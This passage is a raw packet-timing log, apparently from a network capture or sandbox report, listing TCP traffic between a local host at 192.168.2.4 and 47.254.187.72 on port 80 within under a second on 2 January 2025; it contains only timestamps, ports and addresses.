                                                                            Jan 2, 2025 20:34:57.570573092 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570584059 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570589066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.570595026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570605040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570620060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.570621967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.570621967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.570657969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.570657969 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.574034929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574044943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574054956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574065924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574085951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574095964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574106932 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574110985 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.574117899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574126959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.574134111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.574281931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.580852032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580869913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580882072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580892086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580902100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580912113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580921888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.580929041 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.580965996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.580965996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.583219051 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583242893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583254099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583265066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583275080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583286047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583290100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.583297968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583307028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.583311081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.583329916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.583751917 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.588359118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588371992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588381052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588391066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588401079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588411093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588421106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588430882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.588435888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.588613033 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.598649979 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598659992 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598742008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598752022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598767042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598778963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598788977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598799944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.598807096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.598807096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.599750042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603298903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603310108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603327036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603353977 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603359938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603375912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603385925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603385925 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603395939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603406906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603410959 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.603415966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603434086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.603746891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621576071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621589899 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621599913 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621653080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621660948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621660948 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621663094 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621673107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621682882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621694088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.621696949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621696949 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621732950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.621732950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.630121946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630151987 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630323887 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630333900 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630345106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630350113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.630354881 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630364895 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630376101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.630378962 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.630387068 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.631758928 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.632751942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632764101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632777929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632787943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632798910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632808924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632819891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632822990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.632828951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.632843018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.632868052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.632868052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.633512020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633528948 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633538961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633548975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633553028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.633559942 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633569002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633579969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633589983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.633593082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.633615017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.633615017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.633685112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.634260893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634272099 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634288073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634303093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634310007 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.634314060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634324074 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634335041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634345055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.634350061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.634350061 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.634614944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.650913954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.650930882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.650943041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651009083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651010036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651010036 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651036024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651046991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651051044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651063919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651073933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651083946 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651086092 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651093960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651103973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651103973 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651114941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651124954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651124954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651135921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651158094 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651187897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651202917 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651212931 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651212931 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651233912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651243925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651254892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651257038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651257038 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651299000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651307106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651307106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651309967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651350021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651350021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651911020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651921988 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651932001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651942968 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651952982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651962996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651962996 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.651973009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.651997089 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.652084112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.657309055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657320976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657336950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657352924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657363892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657373905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657381058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.657387018 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657396078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.657443047 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.657471895 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.660748005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660828114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660837889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660851955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.660854101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660866022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660876036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660877943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.660886049 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660897017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.660897017 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.660919905 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.660949945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.667489052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667531967 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667541027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667551994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667565107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667572975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.667655945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.667674065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667690039 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667701006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667710066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.667725086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.667732954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.667757988 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.669961929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.669982910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.669994116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.670039892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.670044899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.670044899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.670058012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.670069933 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.670079947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.670083046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.670120001 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.670120955 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.674999952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675034046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675074100 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675081015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675081015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675086021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675101042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675112009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675122023 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675124884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675124884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675134897 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.675148010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675148010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.675309896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.685770035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685785055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685801983 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685813904 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685825109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685834885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685836077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.685846090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.685870886 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.685898066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.690114021 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690146923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690161943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690179110 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690188885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690200090 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690202951 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.690210104 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690221071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.690242052 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.690268040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.690268040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.708430052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708451986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708463907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708475113 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708487034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708498001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708499908 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.708513975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708528042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.708549976 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.708576918 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.717082024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717093945 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717108965 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717125893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717134953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717144966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717154980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717164040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.717164993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717171907 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.717173100 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.717236042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.717236042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.719552040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719568014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719579935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719588995 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719599009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719609022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719619036 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719628096 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.719630003 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.719647884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.719674110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.720328093 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720339060 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720349073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720369101 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720383883 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720392942 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.720395088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720405102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720416069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.720427990 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.720442057 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.720525980 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.721012115 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721081972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721091032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721101046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721112013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721133947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.721148014 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.721153975 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.721169949 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721179962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721189022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.721224070 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.721355915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:57.737751961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.737770081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.737790108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.737802029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:57.737812996 CET804973047.254.187.72192.168.2.4
